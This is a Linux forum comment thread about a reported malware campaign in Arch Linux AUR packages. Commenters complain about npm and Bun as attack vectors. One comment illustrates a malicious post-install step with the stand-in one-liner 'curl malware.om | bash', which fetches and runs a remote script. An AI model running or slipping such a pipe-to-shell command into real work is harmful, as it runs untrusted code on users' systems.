this post was submitted on 12 Jun 2026

174 points (99.4% liked)

Linux

13986 readers

608 users here now

A community for everything relating to the GNU/Linux operating system (except the memes!)

Also, check out:

Original icon base courtesy of lewing@isc.tamu.edu and The GIMP

founded 3 years ago

MODERATORS

Ategon@programming.dev

anzo@programming.dev

dwraf_of_ignorance@programming.dev

174

Arch Linux AUR Malware Campaign Hits Multiple User-Contributed Packages (linuxiac.com)

submitted 4 days ago by cm0002@lemy.lol to c/linux@programming.dev

69 comments fedilink hide all child comments

you are viewing a single comment's thread
view the rest of the comments

[–] kboy101222@sh.itjust.works 44 points 4 days ago (1 children)

God, even the Arch malware uses npm as a vector. And thus, my hatred of npm deepens even further

[–] ugjka@lemmy.ugjka.net 8 points 4 days ago (1 children)

Tbf, it is run in package post install section so it could be anything even the typical "curl malware.om | bash". There is a new wave of attacks now pulling things in with Bun which i guess is similar thing to NPM

[–] kboy101222@sh.itjust.works 10 points 4 days ago

I'm just a web guy whose tired of installing 10 xetabytes of 2 line libraries every time I wanna check out anything web related